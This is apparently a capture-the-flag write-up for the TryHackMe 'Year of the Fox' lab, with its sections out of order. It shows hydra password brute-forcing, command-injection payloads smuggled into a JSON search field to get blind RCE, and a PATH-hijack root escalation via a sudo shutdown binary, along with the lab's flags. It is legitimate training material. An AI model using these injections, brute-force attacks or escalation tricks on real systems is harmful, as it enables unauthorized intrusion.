Open 10.10.249.21:139
Open 10.10.249.21:445
Open 10.10.249.21:8888

now is open port 22

┌──(witty㉿kali)-[~/Downloads]
└─$ hydra -l fox -P /usr/share/wordlists/rockyou.txt ssh://10.10.249.21:8888 -t 64     
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-25 20:54:20
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://10.10.249.21:8888/
[8888][ssh] host: 10.10.249.21   login: fox   password: ricardo
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 21 final worker threads did not complete until end.
[ERROR] 21 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-25 20:54:43

┌──(witty㉿kali)-[~/Downloads]
└─$ ssh -p 8888 fox@10.10.249.21                   
The authenticity of host '[10.10.249.21]:8888 ([10.10.249.21]:8888)' can't be established.
ED25519 key fingerprint is SHA256:ytuC6e5+2EWnZLeockeugHFQMCmIRWlKFJR/MF8JPJo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.249.21]:8888' (ED25519) to the list of known hosts.
fox@10.10.249.21's password: 


	__   __                       __   _   _            _____         
	\ \ / /__  __ _ _ __    ___  / _| | |_| |__   ___  |  ___|____  __
	 \ V / _ \/ _` | '__|  / _ \| |_  | __| '_ \ / _ \ | |_ / _ \ \/ /
	  | |  __/ (_| | |    | (_) |  _| | |_| | | |  __/ |  _| (_) >  < 
	  |_|\___|\__,_|_|     \___/|_|    \__|_| |_|\___| |_|  \___/_/\_\


                                                                  
fox@year-of-the-fox:~$ ls
samba  user-flag.txt
fox@year-of-the-fox:~$ cat user-flag.txt 
THM{Njg3NWZhNDBjMmNlMzNkMGZmMDBhYjhk}
fox@year-of-the-fox:~$ cd samba/
fox@year-of-the-fox:~/samba$ ls
cipher.txt  creds1.txt
fox@year-of-the-fox:~/samba$ cat cipher.txt 
JV5FKMSNPJGTITTKKF5E46SZGJGXUVJSJZKFS6CONJCXUTTKJV4U26SBPJHUITJUJV5EC6SNPJMX
STL2MN5E6RCNGJGXUWJSJZCE2NKONJGTETLKLEZE26SBGIFE4VCZPBBWUTJUJZVEK6SNPJGXOTL2
IV5E6VCNGRHGURL2JVVFSMSNPJTTETTKJUYE26SRPJGWUTJSJZVE2MSNNJMTCTL2KUZE2VCNGBGX
USL2JZVE2M2ONJEXUCSNNJGTGTL2JEZE4ULPPJHVITLXJZVEK6SPIREXOTLKIF4VURCCNBBWOPJ5
BI======
fox@year-of-the-fox:~/samba$ cat creds1.txt 
JV5GO6SNKRGTKTL2M4ZE2VCNPBGXUWL2JZKE26SNPJGXUT2UJV4E26SVPJGXUWJSJV5FC6SNPJMT
ETL2LF5E42SZPJGXURJSJV5E2MCONJKXUTSEJU2U42SZGIFE26SZPBBWUTJSJV5E2MSNKRGXOTL2
KUZE2VCZPJGXUQL2J5CE26KONJITETSELF5E42SRGJGWUTL2JV5FC6SNIRGXQTL2IF5E22SNO5GX
UY32J5KE26KNPJRXUCSPKRMXQTTKKEZE2Z3PPJGUIWJSJV5FC6SNPJEXOTLKIF4VURCCNBBWOPJ5
BI======

fox@year-of-the-fox:~/samba$ sudo -l
Matching Defaults entries for fox on year-of-the-fox:
    env_reset, mail_badpass

User fox may run the following commands on year-of-the-fox:
    (root) NOPASSWD: /usr/sbin/shutdown

fox@year-of-the-fox:/usr/bin$ cd /usr/sbin

fox@year-of-the-fox:/usr/sbin$ python3 -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.8.19.103 - - [26/Mar/2023 02:05:35] "GET /shutdown HTTP/1.1" 200 -

┌──(witty㉿kali)-[~/Downloads]
└─$ wget http://10.10.249.21:8000/shutdown
--2023-03-25 21:05:34--  http://10.10.249.21:8000/shutdown
Connecting to 10.10.249.21:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8304 (8.1K) [application/octet-stream]
Saving to: ‘shutdown’

shutdown              100%[=========================>]   8.11K  --.-KB/s    in 0s      

2023-03-25 21:05:34 (115 MB/s) - ‘shutdown’ saved [8304/8304]

┌──(witty㉿kali)-[~/Downloads]
└─$ file shutdown 
shutdown: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=c855d329bb81903275997549d0856f9fcb1d40fd, not stripped

┌──(witty㉿kali)-[~/Downloads]
└─$ strings shutdown      
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
poweroff
;*3$"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7698
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
shutdown.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

the binary executes `poweroff` without an absolute path

fox@year-of-the-fox:/usr/sbin$ cd /tmp
fox@year-of-the-fox:/tmp$ cp /bin/bash /tmp/poweroff
fox@year-of-the-fox:/tmp$ sudo "PATH=/tmp:$PATH" /usr/sbin/shutdown
root@year-of-the-fox:/tmp# cd /root
root@year-of-the-fox:/root# ls -lah
total 36K
drwx------  5 root root 4.0K Mar 25 22:17 .
drwxr-xr-x 22 root root 4.0K May 29  2020 ..
lrwxrwxrwx  1 root root    9 May 28  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K May 30  2020 .cache
drwx------  3 root root 4.0K May 30  2020 .gnupg
drwxr-xr-x  3 root root 4.0K May 28  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   21 May 31  2020 root.txt
-rw-r--r--  1 root root   75 May 31  2020 .selected_editor
root@year-of-the-fox:/root# cat root.txt 
Not here -- go find!

root@year-of-the-fox:/root# find /home -group root -type f
/home/rascal/.did-you-think-I-was-useless.root
/home/fox/user-flag.txt
/home/fox/samba/cipher.txt
root@year-of-the-fox:/root# cat /home/rascal/.did-you-think-I-was-useless.root
THM{ODM3NTdkMDljYmM4ZjdhZWFhY2VjY2Fk}

Here's the prize:

YTAyNzQ3ODZlMmE2MjcwNzg2NjZkNjQ2Nzc5NzA0NjY2Njc2NjY4M2I2OTMyMzIzNTNhNjk2ODMwMwo=

Good luck!

https://cyberchef.io/#recipe=Reverse('Character')From_Hex('Auto')ROT13(true,true,false,21)&input=YTAyNzQ3ODZlMmE2MjcwNzg2NjZkNjQ2Nzc5NzA0NjY2Njc2NjY4M2I2OTMyMzIzNTNhNjk2ODMwMw

What is the web flag?

THM{Nzg2ZWQwYWUwN2UwOTU3NDY5ZjVmYTYw}

What is the user flag?

THM{Njg3NWZhNDBjMmNlMzNkMGZmMDBhYjhk}

What is the root flag?

THM{ODM3NTdkMDljYmM4ZjdhZWFhY2VjY2Fk}

[[PS Eclipse]]

PreviousOutlook NTLM Leak NextPS Eclipse

Last updated 2 years ago

Was this helpful?

┌──(witty㉿kali)-[~/bug_hunter/Endpoints/screenshots] └─$ rustscan -a 10.10.249.21 --ulimit 5500 -b 65535 -- -A -Pn .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan [~] The config file is expected to be at "/home/witty/.rustscan.toml" [~] Automatically increasing ulimit value to 5500. [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers Open 10.10.249.21:80 Open 10.10.249.21:139 Open 10.10.249.21:445 [~] Starting Script(s) [>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}") Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. [~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-25 18:20 EDT NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 18:20 Completed Parallel DNS resolution of 1 host. at 18:20, 0.02s elapsed DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 18:20 Scanning 10.10.249.21 [3 ports] Discovered open port 80/tcp on 10.10.249.21 Discovered open port 445/tcp on 10.10.249.21 Discovered open port 139/tcp on 10.10.249.21 Completed Connect Scan at 18:20, 0.19s elapsed (3 total ports) Initiating Service scan at 18:20 Scanning 3 services on 10.10.249.21 Completed Service scan at 18:20, 11.65s elapsed (3 services on 1 host) NSE: Script scanning 10.10.249.21. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 6.01s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.78s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed Nmap scan report for 10.10.249.21 Host is up, received user-set (0.19s latency). Scanned at 2023-03-25 18:20:36 EDT for 19s PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack Apache httpd 2.4.29 |_http-server-header: Apache/2.4.29 (Ubuntu) | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=You want in? Gotta guess the password! |_http-title: 401 Unauthorized 139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX) 445/tcp open netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX) Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX Host script results: | smb2-security-mode: | 311: |_ Message signing enabled but not required |_clock-skew: mean: 0s, deviation: 0s, median: 0s | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: year-of-the-fox | NetBIOS computer name: YEAR-OF-THE-FOX\x00 | Domain name: lan | FQDN: year-of-the-fox.lan |_ System time: 2023-03-25T22:20:49+00:00 | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 3140/tcp): CLEAN (Couldn't connect) | Check 2 (port 45749/tcp): CLEAN (Couldn't connect) | Check 3 (port 29474/udp): CLEAN (Failed to receive data) | Check 4 (port 25502/udp): CLEAN (Failed to receive data) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox) | Names: | YEAR-OF-THE-FOX<00> Flags: <unique><active> | YEAR-OF-THE-FOX<03> Flags: <unique><active> | YEAR-OF-THE-FOX<20> Flags: <unique><active> | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | YEAROFTHEFOX<00> Flags: <group><active> | YEAROFTHEFOX<1d> Flags: <unique><active> | YEAROFTHEFOX<1e> Flags: <group><active> | Statistics: | 0000000000000000000000000000000000 | 0000000000000000000000000000000000 |_ 0000000000000000000000000000 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2023-03-25T22:20:49 |_ start_date: N/A NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.91 seconds ┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector] └─$ smbclient -N -L 10.10.249.21 Sharename Type Comment --------- ---- ------- yotf Disk Fox's Stuff -- keep out! IPC$ IPC IPC Service (year-of-the-fox server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- YEAROFTHEFOX YEAR-OF-THE-FOX ┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector] └─$ smbmap -u anonymous -H 10.10.249.21 [+] Guest session IP: 10.10.249.21:445 Name: 10.10.249.21 Disk Permissions Comment ---- ----------- ------- yotf NO ACCESS Fox's Stuff -- keep out! IPC$ NO ACCESS IPC Service (year-of-the-fox server (Samba, Ubuntu)) ┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector] └─$ rpcclient -U "" 10.10.249.21 Password for [WORKGROUP\]: rpcclient $> enumdomains name:[YEAR-OF-THE-FOX] idx:[0x0] name:[Builtin] idx:[0x1] rpcclient $> enumdomusers user:[fox] rid:[0x3e8] rpcclient $> quit ──(witty㉿kali)-[~/bug_hunter/SQLiDetector] └─$ sudo crackmapexec smb 10.10.249.21 -u 'guest' -p '' --rid-brute SMB 10.10.249.21 445 YEAR-OF-THE-FOX [*] Windows 6.1 (name:YEAR-OF-THE-FOX) (domain:lan) (signing:False) (SMBv1:True) SMB 10.10.249.21 445 YEAR-OF-THE-FOX [+] lan\guest: SMB 10.10.249.21 445 YEAR-OF-THE-FOX [+] Brute forcing RIDs Traceback (most recent call last): File "/usr/bin/crackmapexec", line 8, in <module> sys.exit(main()) uhmm not work ┌──(witty㉿kali)-[~/bug_hunter/Endpoints/screenshots] └─$ rustscan -a 10.10.249.21 --ulimit 5500 -b 65535 -- -A -Pn .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan [~] The config file is expected to be at "/home/witty/.rustscan.toml" [~] Automatically increasing ulimit value to 5500. [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers Open 10.10.249.21:80 Open 10.10.249.21:139 Open 10.10.249.21:445 [~] Starting Script(s) [>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}") Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. [~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-25 18:20 EDT NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 18:20 Completed Parallel DNS resolution of 1 host. at 18:20, 0.02s elapsed DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 18:20 Scanning 10.10.249.21 [3 ports] Discovered open port 80/tcp on 10.10.249.21 Discovered open port 445/tcp on 10.10.249.21 Discovered open port 139/tcp on 10.10.249.21 Completed Connect Scan at 18:20, 0.19s elapsed (3 total ports) Initiating Service scan at 18:20 Scanning 3 services on 10.10.249.21 Completed Service scan at 18:20, 11.65s elapsed (3 services on 1 host) NSE: Script scanning 10.10.249.21. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 6.01s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.78s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed Nmap scan report for 10.10.249.21 Host is up, received user-set (0.19s latency). Scanned at 2023-03-25 18:20:36 EDT for 19s PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack Apache httpd 2.4.29 |_http-server-header: Apache/2.4.29 (Ubuntu) | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=You want in? Gotta guess the password! |_http-title: 401 Unauthorized 139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX) 445/tcp open netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX) Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX Host script results: | smb2-security-mode: | 311: |_ Message signing enabled but not required |_clock-skew: mean: 0s, deviation: 0s, median: 0s | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: year-of-the-fox | NetBIOS computer name: YEAR-OF-THE-FOX\x00 | Domain name: lan | FQDN: year-of-the-fox.lan |_ System time: 2023-03-25T22:20:49+00:00 | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 3140/tcp): CLEAN (Couldn't connect) | Check 2 (port 45749/tcp): CLEAN (Couldn't connect) | Check 3 (port 29474/udp): CLEAN (Failed to receive data) | Check 4 (port 25502/udp): CLEAN (Failed to receive data) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox) | Names: | YEAR-OF-THE-FOX<00> Flags: <unique><active> | YEAR-OF-THE-FOX<03> Flags: <unique><active> | YEAR-OF-THE-FOX<20> Flags: <unique><active> | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | YEAROFTHEFOX<00> Flags: <group><active> | YEAROFTHEFOX<1d> Flags: <unique><active> | YEAROFTHEFOX<1e> Flags: <group><active> | Statistics: | 0000000000000000000000000000000000 | 0000000000000000000000000000000000 |_ 0000000000000000000000000000 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2023-03-25T22:20:49 |_ start_date: N/A NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 18:20 Completed NSE at 18:20, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.91 seconds ┌──(witty㉿kali)-[~/bug_hunter/Endpoints/screenshots] └─$ enum4linux -a 10.10.249.21 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 25 18:27:13 2023 =========================================( Target Information )========================================= Target ........... 10.10.249.21 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ============================( Enumerating Workgroup/Domain on 10.10.249.21 )============================ [+] Got domain/workgroup name: YEAROFTHEFOX ================================( Nbtstat Information for 10.10.249.21 )================================ Looking up status of 10.10.249.21 YEAR-OF-THE-FOX <00> - B <ACTIVE> Workstation Service YEAR-OF-THE-FOX <03> - B <ACTIVE> Messenger Service YEAR-OF-THE-FOX <20> - B <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser YEAROFTHEFOX <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name YEAROFTHEFOX <1d> - B <ACTIVE> Master Browser YEAROFTHEFOX <1e> - <GROUP> B <ACTIVE> Browser Service Elections MAC Address = 00-00-00-00-00-00 ===================================( Session Check on 10.10.249.21 )=================================== [+] Server 10.10.249.21 allows sessions using username '', password '' ================================( Getting domain SID for 10.10.249.21 )================================ Domain Name: YEAROFTHEFOX Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ===================================( OS information on 10.10.249.21 )=================================== [E] Can't get OS info with smbclient [+] Got OS info for 10.10.249.21 from srvinfo: YEAR-OF-THE-FOXWk Sv PrQ Unx NT SNT year-of-the-fox server (Samba, Ubuntu) platform_id : 500 os version : 6.1 server type : 0x809a03 =======================================( Users on 10.10.249.21 )======================================= index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: fox Name: fox Desc: user:[fox] rid:[0x3e8] =================================( Share Enumeration on 10.10.249.21 )================================= Sharename Type Comment --------- ---- ------- yotf Disk Fox's Stuff -- keep out! IPC$ IPC IPC Service (year-of-the-fox server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- YEAROFTHEFOX YEAR-OF-THE-FOX [+] Attempting to map shares on 10.10.249.21 //10.10.249.21/yotf Mapping: DENIED Listing: N/A Writing: N/A [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* //10.10.249.21/IPC$ Mapping: N/A Listing: N/A Writing: N/A ============================( Password Policy Information for 10.10.249.21 )============================ [+] Attaching to 10.10.249.21 using a NULL share [+] Trying protocol 139/SMB... [+] Found domain(s): [+] YEAR-OF-THE-FOX [+] Builtin [+] Password Info for Domain: YEAR-OF-THE-FOX [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: 37 days 6 hours 21 minutes [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 =======================================( Groups on 10.10.249.21 )======================================= [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ==================( Users on 10.10.249.21 via RID cycling (RIDS: 500-550,1000-1050) )================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\fox (Local User) S-1-22-1-1001 Unix User\rascal (Local User) [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) [+] Enumerating users using SID S-1-5-21-978893743-2663913856-222388731 and logon username '', password '' S-1-5-21-978893743-2663913856-222388731-501 YEAR-OF-THE-FOX\nobody (Local User) S-1-5-21-978893743-2663913856-222388731-513 YEAR-OF-THE-FOX\None (Domain Group) S-1-5-21-978893743-2663913856-222388731-1000 YEAR-OF-THE-FOX\fox (Local User) ===============================( Getting printer info for 10.10.249.21 )=============================== No printers returned. enum4linux complete on Sat Mar 25 18:41:59 2023 This site is asking you to sign in. GET / HTTP/1.1 Host: 10.10.249.21 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.1 401 Unauthorized Date: Sat, 25 Mar 2023 23:10:24 GMT Server: Apache/2.4.29 (Ubuntu) WWW-Authenticate: Basic realm="You want in? Gotta guess the password!" Content-Length: 459 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>401 Unauthorized</title> </head><body> <h1>Unauthorized</h1> <p>This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.</p> <hr> <address>Apache/2.4.29 (Ubuntu) Server at 10.10.249.21 Port 80</address> </body></html> https://forums.hak5.org/topic/18815-http-head-or-http-get/ ┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector] └─$ hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.249.21 http-head / or hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.249.21 http-get - ┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector] └─$ hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.249.21 http-get -t 64 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-25 19:16:33 [WARNING] You must supply the web page as an additional option or via -m, default path set to / [DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task [DATA] attacking http-get://10.10.249.21:80/ [80][http-get] host: 10.10.249.21 login: rascal password: iloveyou2 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-25 19:16:57 let's sign in {"target":"\"||whoami||\"" } ["important-data.txt"] {"target":"\"$(whoami)\"" } ["Invalid Character"] {"target":"\";whoami;\"" } ["No file returned"] blind rce {"target":"\";ping -c 4 10.8.19.103 ;\"" } ┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector] └─$ sudo tcpdump -i tun0 -n [sudo] password for witty: tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 19:27:52.253674 IP 10.8.19.103.50908 > 10.10.249.21.80: Flags [S], seq 3220311246, win 64240, options [mss 1460,sackOK,TS val 3382066425 ecr 0,nop,wscale 7], length 0 19:27:52.452323 IP 10.10.249.21.80 > 10.8.19.103.50908: Flags [S.], seq 2912484493, ack 3220311247, win 62643, options [mss 1288,sackOK,TS val 743969307 ecr 3382066425,nop,wscale 6], length 0 19:27:52.452422 IP 10.8.19.103.50908 > 10.10.249.21.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 3382066624 ecr 743969307], length 0 19:27:52.452642 IP 10.8.19.103.50908 > 10.10.249.21.80: Flags [P.], seq 1:452, ack 1, win 502, options [nop,nop,TS val 3382066624 ecr 743969307], length 451: HTTP: POST /assets/php/search.php HTTP/1.1 19:27:52.650243 IP 10.10.249.21.80 > 10.8.19.103.50908: Flags [.], ack 452, win 972, options [nop,nop,TS val 743969498 ecr 3382066624], length 0 19:27:52.650382 IP 10.10.249.21 > 10.8.19.103: ICMP echo request, id 1662, seq 1, length 64 19:27:52.669309 IP 10.8.19.103 > 10.10.249.21: ICMP echo reply, id 1662, seq 1, length 64 19:27:53.650936 IP 10.10.249.21 > 10.8.19.103: ICMP echo request, id 1662, seq 2, length 64 19:27:53.650971 IP 10.8.19.103 > 10.10.249.21: ICMP echo reply, id 1662, seq 2, length 64 19:27:54.652264 IP 10.10.249.21 > 10.8.19.103: ICMP echo request, id 1662, seq 3, length 64 19:27:54.652305 IP 10.8.19.103 > 10.10.249.21: ICMP echo reply, id 1662, seq 3, length 64 19:27:55.653450 IP 10.10.249.21 > 10.8.19.103: ICMP echo request, id 1662, seq 4, length 64 19:27:55.653500 IP 10.8.19.103 > 10.10.249.21: ICMP echo reply, id 1662, seq 4, length 64 19:27:55.847825 IP 10.10.249.21.80 > 10.8.19.103.50908: Flags [P.], seq 1:188, ack 452, win 972, options [nop,nop,TS val 743972700 ecr 3382066624], length 187: HTTP: HTTP/1.1 200 OK 